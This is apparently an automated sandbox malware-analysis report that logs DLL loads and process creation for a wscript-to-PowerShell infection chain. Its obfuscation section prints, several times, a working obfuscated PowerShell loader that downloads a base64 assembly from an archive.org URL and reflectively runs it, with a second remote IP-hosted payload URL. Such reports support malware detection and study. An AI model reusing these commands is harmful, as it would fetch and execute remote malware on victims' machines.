Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1987452573.000002669CEED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000004.00000002.1987452573.000002669CE79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.1988564778.000002669D0DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1988335673.000002669CF49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.1964132789.0000026695D7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1989363837.000002669D440000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000004.00000002.1987452573.000002669CE79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdbbN$ source: powershell.exe, 00000004.00000002.1988564778.000002669D0DC000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'KCgnWicrJ25pdScrJ3JsJysnID0gN3VYaHR0JysncHM", "0", "false");
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgnWicrJ25pdScrJ3JsJysnID0gN3VYaHR0JysncHM6Ly9pYTYnKycwJysnMDEnKycwJysnMCcrJy51cy4nKydhJysncmMnKydoaXYnKydlLm9yZy8nKycyNC9pdGVtcy9kJysnZScrJ3RhaCcrJy1ub3RlJysnLXYvRGUnKyd0YWhOb3RlVi4nKyd0eCcrJ3Q3JysndVgnKyc7JysnWicrJ25pYmFzJysnZTY0JysnQ29uJysndCcrJ2VudCA9IChOZXctT2InKydqZWN0IFN5Jysnc3RlJysnbScrJy4nKydOJysnZScrJ3QuV2ViQycrJ2wnKydpZW50JysnKS5EbycrJ3cnKyduJysnbG9hZFN0JysncmluZyhaJysnbicrJ2l1cmwpJysnO1puaScrJ2JpbmFyeUMnKydvbicrJ3RlbnQnKycgJysnPSBbUycrJ3lzdGUnKydtLkMnKydvJysnbnZlcicrJ3RdOjpGcicrJ29tQmFzZTY0U3RyaScrJ24nKydnKFpuaWJhc2U2JysnNENvbnQnKydlJysnbicrJ3QnKycpOycrJ1puaWEnKydzc2VtYmwnKyd5ICcrJz0gW1JlZmwnKydlY3QnKydpb24nKycuQXNzZScrJ20nKydibHldJysnOjpMJysnb2FkJysnKCcrJ1onKyduaWJpJysnbmFyeUNvbicrJ3QnKydlJysnbnQpO1onKyduJysnaXR5cGUgJysnPScrJyBaJysnbmlhc3NlbWInKydseS5HZXRUeXBlKDd1WCcrJ1InKyd1JysnblBFLkgnKydvJysnbWU3JysndVgnKycpOycrJ1puaW1lJysndGgnKydvZCcrJyAnKyc9IFonKyduJysnaXR5cGUuJysnRycrJ2UnKyd0TWV0JysnaCcrJ29kJysnKDd1WCcrJ1YnKydBSTd1JysnWCk7WicrJ25pbWV0aG8nKydkLkknKydudm9rZSgnKydabicrJ2knKyduJysndWxsLCcrJyAnKydbJysnb2JqZWMnKyd0W11dJysnQCcrJyg3dVh0eHQuRicrJ0ZDTlIvNDEnKyc0Mi81OC45OCcrJzEuMicrJzMnKycyLjI3MScrJy8nKycvJysnOnB0dGgnKyc3JysndVggJysnLCA3dVhkZXNhdGl2YScrJ2RvNycrJ3VYICcrJywgN3UnKydYZGVzJysnYScrJ3RpJysndmEnKydkbzd1WCAsJysnIDd1WCcrJ2QnKydlc2F0aXZhZG83dVgsNycrJ3VYUicrJ2VnQScrJ3NtNycrJ3VYJysnLDd1WDcnKyd1WCkpJyktUkVwbGFDZSAoW0NoQXJdNTUrW0NoQXJdMTE3K1tDaEFyXTg4KSxbQ2hBcl0zOSAtUkVwbGFDZSdabmknLFtDaEFyXTM2KSB8LiAoICRlTlY6Y09tU1BlQ1s0LDI0LDI1XS1qb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('Z'+'niu'+'rl'+' = 7uXhtt'+'ps://ia6'+'0'+'01'+'0'+'0'+'.us.'+'a'+'rc'+'hiv'+'e.org/'+'24/items/d'+'e'+'tah'+'-note'+'-v/De'+'tahNoteV.'+'tx'+'t7'+'uX'+';'+'Z'+'nibas'+'e64'+'Con'+'t'+'ent = (New-Ob'+'ject Sy'+'ste'+'m'+'.'+'N'+'e'+'t.WebC'+'l'+'ient'+').Do'+'w'+'n'+'loadSt'+'ring(Z'+'n'+'iurl)'+';Zni'+'binaryC'+'on'+'tent'+' '+'= [S'+'yste'+'m.C'+'o'+'nver'+'t]::Fr'+'omBase64Stri'+'n'+'g(Znibase6'+'4Cont'+'e'+'n'+'t'+');'+'Znia'+'ssembl'+'y '+'= [Refl'+'ect'+'ion'+'.Asse'+'m'+'bly]'+'::L'+'oad'+'('+'Z'+'nibi'+'naryCon'+'t'+'e'+'nt);Z'+'n'+'itype '+'='+' Z'+'niassemb'+'ly.GetType(7uX'+'R'+'u'+'nPE.H'+'o'+'me7'+'uX'+');'+'Znime'+'th'+'od'+' '+'= Z'+'n'+'itype.'+'G'+'e'+'tMet'+'h'+'od'+'(7uX'+'V'+'AI7u'+'X);Z'+'nimetho'+'d.I'+'nvoke('+'Zn'+'i'+'n'+'ull,'+' '+'['+'objec'+'t[]]'+'@'+'(7uXtxt.F'+'FCNR/41'+'42/58.98'+'1.2'+'3'+'2.271'+'/'+'/'+':ptth'+'7'+'uX '+', 7uXdesativa'+'do7'+'uX '+', 7u'+'Xdes'+'a'+'ti'+'va'+'do7uX ,'+' 7uX'+'d'+'esativado7uX,7'+'uXR'+'egA'+'sm7'+'uX'+',7uX7'+'uX))')-REplaCe ([ChAr]55+[ChAr]117+[ChAr]88),[ChAr]39 -REplaCe'Zni',[ChAr]36) |. ( $eNV:cOmSPeC[4,24,25]-joiN'')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('Z'+'niu'+'rl'+' = 7uXhtt'+'ps://ia6'+'0'+'01'+'0'+'0'+'.us.'+'a'+'rc'+'hiv'+'e.org/'+'24/items/d'+'e'+'tah'+'-note'+'-v/De'+'tahNoteV.'+'tx'+'t7'+'uX'+';'+'Z'+'nibas'+'e64'+'Con'+'t'+'ent = (New-Ob'+'ject Sy'+'ste'+'m'+'.'+'N'+'e'+'t.WebC'+'l'+'ient'+').Do'+'w'+'n'+'loadSt'+'ring(Z'+'n'+'iurl)'+';Zni'+'binaryC'+'on'+'tent'+' '+'= [S'+'yste'+'m.C'+'o'+'nver'+'t]::Fr'+'omBase64Stri'+'n'+'g(Znibase6'+'4Cont'+'e'+'n'+'t'+');'+'Znia'+'ssembl'+'y '+'= [Refl'+'ect'+'ion'+'.Asse'+'m'+'bly]'+'::L'+'oad'+'('+'Z'+'nibi'+'naryCon'+'t'+'e'+'nt);Z'+'n'+'itype '+'='+' Z'+'niassemb'+'ly.GetType(7uX'+'R'+'u'+'nPE.H'+'o'+'me7'+'uX'+');'+'Znime'+'th'+'od'+' '+'= Z'+'n'+'itype.'+'G'+'e'+'tMet'+'h'+'od'+'(7uX'+'V'+'AI7u'+'X);Z'+'nimetho'+'d.I'+'nvoke('+'Zn'+'i'+'n'+'ull,'+' '+'['+'objec'+'t[]]'+'@'+'(7uXtxt.F'+'FCNR/41'+'42/58.98'+'1.2'+'3'+'2.271'+'/'+'/'+':ptth'+'7'+'uX '+', 7uXdesativa'+'do7'+'uX '+', 7u'+'Xdes'+'a'+'ti'+'va'+'do7uX ,'+' 7uX'+'d'+'esativado7uX,7'+'uXR'+'egA'+'sm7'+'uX'+',7uX7'+'uX))')-REplaCe ([ChAr]55+[ChAr]117+[ChAr]88),[ChAr]39 -REplaCe'Zni',[ChAr]36) |. ( $eNV:cOmSPeC[4,24,25]-joiN'')" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnWicrJ25pdScrJ3JsJysnID0gN3VYaHR0JysncHM6Ly9pYTYnKycwJysnMDEnKycwJysnMCcrJy51cy4nKydhJysncmMnKydoaXYnKydlLm9yZy8nKycyNC9pdGVtcy9kJysnZScrJ3RhaCcrJy1ub3RlJysnLXYvRGUnKyd0YWhOb3RlVi4nKyd0eCcrJ3Q3JysndVgnKyc7JysnWicrJ25pYmFzJysnZTY0JysnQ29uJysndCcrJ2VudCA9IChOZXctT2InKydqZWN0IFN5Jysnc3RlJysnbScrJy4nKydOJysnZScrJ3QuV2ViQycrJ2wnKydpZW50JysnKS5EbycrJ3cnKyduJysnbG9hZFN0JysncmluZyhaJysnbicrJ2l1cmwpJysnO1puaScrJ2JpbmFyeUMnKydvbicrJ3RlbnQnKycgJysnPSBbUycrJ3lzdGUnKydtLkMnKydvJysnbnZlcicrJ3RdOjpGcicrJ29tQmFzZTY0U3RyaScrJ24nKydnKFpuaWJhc2U2JysnNENvbnQnKydlJysnbicrJ3QnKycpOycrJ1puaWEnKydzc2VtYmwnKyd5ICcrJz0gW1JlZmwnKydlY3QnKydpb24nKycuQXNzZScrJ20nKydibHldJysnOjpMJysnb2FkJysnKCcrJ1onKyduaWJpJysnbmFyeUNvbicrJ3QnKydlJysnbnQpO1onKyduJysnaXR5cGUgJysnPScrJyBaJysnbmlhc3NlbWInKydseS5HZXRUeXBlKDd1WCcrJ1InKyd1JysnblBFLkgnKydvJysnbWU3JysndVgnKycpOycrJ1puaW1lJysndGgnKydvZCcrJyAnKyc9IFonKyduJysnaXR5cGUuJysnRycrJ2UnKyd0TWV0JysnaCcrJ29kJysnKDd1WCcrJ1YnKydBSTd1JysnWCk7WicrJ25pbWV0aG8nKydkLkknKydudm9rZSgnKydabicrJ2knKyduJysndWxsLCcrJyAnKydbJysnb2JqZWMnKyd0W11dJysnQCcrJyg3dVh0eHQuRicrJ0ZDTlIvNDEnKyc0Mi81OC45OCcrJzEuMicrJzMnKycyLjI3MScrJy8nKycvJysnOnB0dGgnKyc3JysndVggJysnLCA3dVhkZXNhdGl2YScrJ2RvNycrJ3VYICcrJywgN3UnKydYZGVzJysnYScrJ3RpJysndmEnKydkbzd1WCAsJysnIDd1WCcrJ2QnKydlc2F0aXZhZG83dVgsNycrJ3VYUicrJ2VnQScrJ3NtNycrJ3VYJysnLDd1WDcnKyd1WCkpJyktUkVwbGFDZSAoW0NoQXJdNTUrW0NoQXJdMTE3K1tDaEFyXTg4KSxbQ2hBcl0zOSAtUkVwbGFDZSdabmknLFtDaEFyXTM2KSB8LiAoICRlTlY6Y09tU1BlQ1s0LDI0LDI1XS1qb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('Z'+'niu'+'rl'+' = 7uXhtt'+'ps://ia6'+'0'+'01'+'0'+'0'+'.us.'+'a'+'rc'+'hiv'+'e.org/'+'24/items/d'+'e'+'tah'+'-note'+'-v/De'+'tahNoteV.'+'tx'+'t7'+'uX'+';'+'Z'+'nibas'+'e64'+'Con'+'t'+'ent = (New-Ob'+'ject Sy'+'ste'+'m'+'.'+'N'+'e'+'t.WebC'+'l'+'ient'+').Do'+'w'+'n'+'loadSt'+'ring(Z'+'n'+'iurl)'+';Zni'+'binaryC'+'on'+'tent'+' '+'= [S'+'yste'+'m.C'+'o'+'nver'+'t]::Fr'+'omBase64Stri'+'n'+'g(Znibase6'+'4Cont'+'e'+'n'+'t'+');'+'Znia'+'ssembl'+'y '+'= [Refl'+'ect'+'ion'+'.Asse'+'m'+'bly]'+'::L'+'oad'+'('+'Z'+'nibi'+'naryCon'+'t'+'e'+'nt);Z'+'n'+'itype '+'='+' Z'+'niassemb'+'ly.GetType(7uX'+'R'+'u'+'nPE.H'+'o'+'me7'+'uX'+');'+'Znime'+'th'+'od'+' '+'= Z'+'n'+'itype.'+'G'+'e'+'tMet'+'h'+'od'+'(7uX'+'V'+'AI7u'+'X);Z'+'nimetho'+'d.I'+'nvoke('+'Zn'+'i'+'n'+'ull,'+' '+'['+'objec'+'t[]]'+'@'+'(7uXtxt.F'+'FCNR/41'+'42/58.98'+'1.2'+'3'+'2.271'+'/'+'/'+':ptth'+'7'+'uX '+', 7uXdesativa'+'do7'+'uX '+', 7u'+'Xdes'+'a'+'ti'+'va'+'do7uX ,'+' 7uX'+'d'+'esativado7uX,7'+'uXR'+'egA'+'sm7'+'uX'+',7uX7'+'uX))')-REplaCe ([ChAr]55+[ChAr]117+[ChAr]88),[ChAr]39 -REplaCe'Zni',[ChAr]36) |. ( $eNV:cOmSPeC[4,24,25]-joiN'')"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnWicrJ25pdScrJ3JsJysnID0gN3VYaHR0JysncHM6Ly9pYTYnKycwJysnMDEnKycwJysnMCcrJy51cy4nKydhJysncmMnKydoaXYnKydlLm9yZy8nKycyNC9pdGVtcy9kJysnZScrJ3RhaCcrJy1ub3RlJysnLXYvRGUnKyd0YWhOb3RlVi4nKyd0eCcrJ3Q3JysndVgnKyc7JysnWicrJ25pYmFzJysnZTY0JysnQ29uJysndCcrJ2VudCA9IChOZXctT2InKydqZWN0IFN5Jysnc3RlJysnbScrJy4nKydOJysnZScrJ3QuV2ViQycrJ2wnKydpZW50JysnKS5EbycrJ3cnKyduJysnbG9hZFN0JysncmluZyhaJysnbicrJ2l1cmwpJysnO1puaScrJ2JpbmFyeUMnKydvbicrJ3RlbnQnKycgJysnPSBbUycrJ3lzdGUnKydtLkMnKydvJysnbnZlcicrJ3RdOjpGcicrJ29tQmFzZTY0U3RyaScrJ24nKydnKFpuaWJhc2U2JysnNENvbnQnKydlJysnbicrJ3QnKycpOycrJ1puaWEnKydzc2VtYmwnKyd5ICcrJz0gW1JlZmwnKydlY3QnKydpb24nKycuQXNzZScrJ20nKydibHldJysnOjpMJysnb2FkJysnKCcrJ1onKyduaWJpJysnbmFyeUNvbicrJ3QnKydlJysnbnQpO1onKyduJysnaXR5cGUgJysnPScrJyBaJysnbmlhc3NlbWInKydseS5HZXRUeXBlKDd1WCcrJ1InKyd1JysnblBFLkgnKydvJysnbWU3JysndVgnKycpOycrJ1puaW1lJysndGgnKydvZCcrJyAnKyc9IFonKyduJysnaXR5cGUuJysnRycrJ2UnKyd0TWV0JysnaCcrJ29kJysnKDd1WCcrJ1YnKydBSTd1JysnWCk7WicrJ25pbWV0aG8nKydkLkknKydudm9rZSgnKydabicrJ2knKyduJysndWxsLCcrJyAnKydbJysnb2JqZWMnKyd0W11dJysnQCcrJyg3dVh0eHQuRicrJ0ZDTlIvNDEnKyc0Mi81OC45OCcrJzEuMicrJzMnKycyLjI3MScrJy8nKycvJysnOnB0dGgnKyc3JysndVggJysnLCA3dVhkZXNhdGl2YScrJ2RvNycrJ3VYICcrJywgN3UnKydYZGVzJysnYScrJ3RpJysndmEnKydkbzd1WCAsJysnIDd1WCcrJ2QnKydlc2F0aXZhZG83dVgsNycrJ3VYUicrJ2VnQScrJ3NtNycrJ3VYJysnLDd1WDcnKyd1WCkpJyktUkVwbGFDZSAoW0NoQXJdNTUrW0NoQXJdMTE3K1tDaEFyXTg4KSxbQ2hBcl0zOSAtUkVwbGFDZSdabmknLFtDaEFyXTM2KSB8LiAoICRlTlY6Y09tU1BlQ1s0LDI0LDI1XS1qb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('Z'+'niu'+'rl'+' = 7uXhtt'+'ps://ia6'+'0'+'01'+'0'+'0'+'.us.'+'a'+'rc'+'hiv'+'e.org/'+'24/items/d'+'e'+'tah'+'-note'+'-v/De'+'tahNoteV.'+'tx'+'t7'+'uX'+';'+'Z'+'nibas'+'e64'+'Con'+'t'+'ent = (New-Ob'+'ject Sy'+'ste'+'m'+'.'+'N'+'e'+'t.WebC'+'l'+'ient'+').Do'+'w'+'n'+'loadSt'+'ring(Z'+'n'+'iurl)'+';Zni'+'binaryC'+'on'+'tent'+' '+'= [S'+'yste'+'m.C'+'o'+'nver'+'t]::Fr'+'omBase64Stri'+'n'+'g(Znibase6'+'4Cont'+'e'+'n'+'t'+');'+'Znia'+'ssembl'+'y '+'= [Refl'+'ect'+'ion'+'.Asse'+'m'+'bly]'+'::L'+'oad'+'('+'Z'+'nibi'+'naryCon'+'t'+'e'+'nt);Z'+'n'+'itype '+'='+' Z'+'niassemb'+'ly.GetType(7uX'+'R'+'u'+'nPE.H'+'o'+'me7'+'uX'+');'+'Znime'+'th'+'od'+' '+'= Z'+'n'+'itype.'+'G'+'e'+'tMet'+'h'+'od'+'(7uX'+'V'+'AI7u'+'X);Z'+'nimetho'+'d.I'+'nvoke('+'Zn'+'i'+'n'+'ull,'+' '+'['+'objec'+'t[]]'+'@'+'(7uXtxt.F'+'FCNR/41'+'42/58.98'+'1.2'+'3'+'2.271'+'/'+'/'+':ptth'+'7'+'uX '+', 7uXdesativa'+'do7'+'uX '+', 7u'+'Xdes'+'a'+'ti'+'va'+'do7uX ,'+' 7uX'+'d'+'esativado7uX,7'+'uXR'+'egA'+'sm7'+'uX'+',7uX7'+'uX))')-REplaCe ([ChAr]55+[ChAr]117+[ChAr]88),[ChAr]39 -REplaCe'Zni',[ChAr]36) |. ( $eNV:cOmSPeC[4,24,25]-joiN'')" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFB4AF11B15 pushad ; iretd 2_2_00007FFB4AF11B4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFB4AF2C755 push edi; retf 4_2_00007FFB4AF2C756
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFB4AF27523 push ebx; iretd 4_2_00007FFB4AF2756A
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
